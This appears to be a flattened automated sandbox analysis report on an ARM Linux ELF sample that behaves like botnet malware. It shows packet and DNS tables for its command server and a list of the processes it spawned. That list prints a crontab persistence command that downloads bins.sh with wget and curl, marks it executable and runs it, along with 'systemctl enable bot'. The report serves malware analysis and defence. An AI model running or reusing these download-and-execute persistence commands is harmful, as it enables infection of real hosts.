              Nov 20, 2024 01:02:33.962333918 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:33.962429047 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:33.967308998 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:38.958106995 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:38.958259106 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:38.963148117 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:38.963211060 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:38.968102932 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:43.958460093 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:43.958625078 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:43.967453003 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:43.967506886 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:43.976331949 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:49.026916981 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:49.027076960 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:49.032047987 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:49.032164097 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:49.037246943 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:53.959932089 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:53.960160971 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:53.965152025 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:53.965234041 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:53.970148087 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:58.960525036 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:58.960812092 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:58.966877937 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:02:58.966989040 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:02:58.971900940 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:03:03.961641073 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:03:03.962930918 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:03:03.967983007 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:03:03.968067884 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:03:03.973119974 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:03:08.962224007 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:03:08.962395906 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:03:08.967302084 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:03:08.967395067 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:03:08.972315073 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:03:13.963042021 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:03:13.963258028 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:03:13.968967915 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:03:13.969063044 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:03:13.974695921 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:03:19.014769077 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:03:19.014991045 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:03:19.020018101 CET129040008172.111.38.48192.168.2.14
              Nov 20, 2024 01:03:19.020096064 CET400081290192.168.2.14172.111.38.48
              Nov 20, 2024 01:03:19.025032997 CET129040008172.111.38.48192.168.2.14
              TimestampSource PortDest PortSource IPDest IP
              Nov 20, 2024 01:01:23.431858063 CET5172853192.168.2.141.1.1.1
              Nov 20, 2024 01:01:23.465831995 CET53517281.1.1.1192.168.2.14
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Nov 20, 2024 01:01:23.431858063 CET192.168.2.141.1.1.10xfe1Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
              Nov 20, 2024 01:01:28.685604095 CET192.168.2.148.8.8.80x3e16Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
              Nov 20, 2024 01:01:28.685656071 CET192.168.2.148.8.8.80x925eStandard query (0)daisy.ubuntu.com28IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Nov 20, 2024 01:01:23.465831995 CET1.1.1.1192.168.2.140xfe1No error (0)host.zopz-api.com172.111.38.48A (IP address)IN (0x0001)false
              Nov 20, 2024 01:01:29.129717112 CET8.8.8.8192.168.2.140x3e16No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
              Nov 20, 2024 01:01:29.129717112 CET8.8.8.8192.168.2.140x3e16No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

              System Behavior

              Start time (UTC):00:01:18
              Start date (UTC):20/11/2024
              Path:/tmp/armv4l.elf
              Arguments:/tmp/armv4l.elf
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):00:01:18
              Start date (UTC):20/11/2024
              Path:/tmp/armv4l.elf
              Arguments:-
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):00:01:18
              Start date (UTC):20/11/2024
              Path:/tmp/armv4l.elf
              Arguments:-
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/tmp/armv4l.elf
              Arguments:-
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/tmp/armv4l.elf
              Arguments:-
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/tmp/armv4l.elf
              Arguments:-
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/usr/bin/crontab
              Arguments:crontab -l
              File size:43720 bytes
              MD5 hash:66e521d421ac9b407699061bf21806f5

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/usr/bin/chmod
              Arguments:chmod +x bins.sh
              File size:63864 bytes
              MD5 hash:739483b900c045ae1374d6f53a86a279

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/usr/bin/sh
              Arguments:sh bins.sh
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/bin/curl
              Arguments:/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
              File size:239848 bytes
              MD5 hash:add6bc2195e82c55985ccf49fd4048e6

              Start time (UTC):00:01:25
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:25
              Start date (UTC):20/11/2024
              Path:/usr/bin/chmod
              Arguments:chmod +x bins.sh
              File size:63864 bytes
              MD5 hash:739483b900c045ae1374d6f53a86a279

              Start time (UTC):00:01:25
              Start date (UTC):20/11/2024
              Path:/usr/bin/sh
              Arguments:sh bins.sh
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:23
              Start date (UTC):20/11/2024
              Path:/usr/bin/crontab
              Arguments:crontab -
              File size:43720 bytes
              MD5 hash:66e521d421ac9b407699061bf21806f5

              Start time (UTC):00:01:25
              Start date (UTC):20/11/2024
              Path:/tmp/armv4l.elf
              Arguments:-
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):00:01:25
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:sh -c "/bin/systemctl enable bot"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:25
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:25
              Start date (UTC):20/11/2024
              Path:/bin/systemctl
              Arguments:/bin/systemctl enable bot
              File size:996584 bytes
              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

              Start time (UTC):00:01:26
              Start date (UTC):20/11/2024
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):00:01:26
              Start date (UTC):20/11/2024
              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
              File size:22760 bytes
              MD5 hash:3633b075f40283ec938a2a6a89671b0e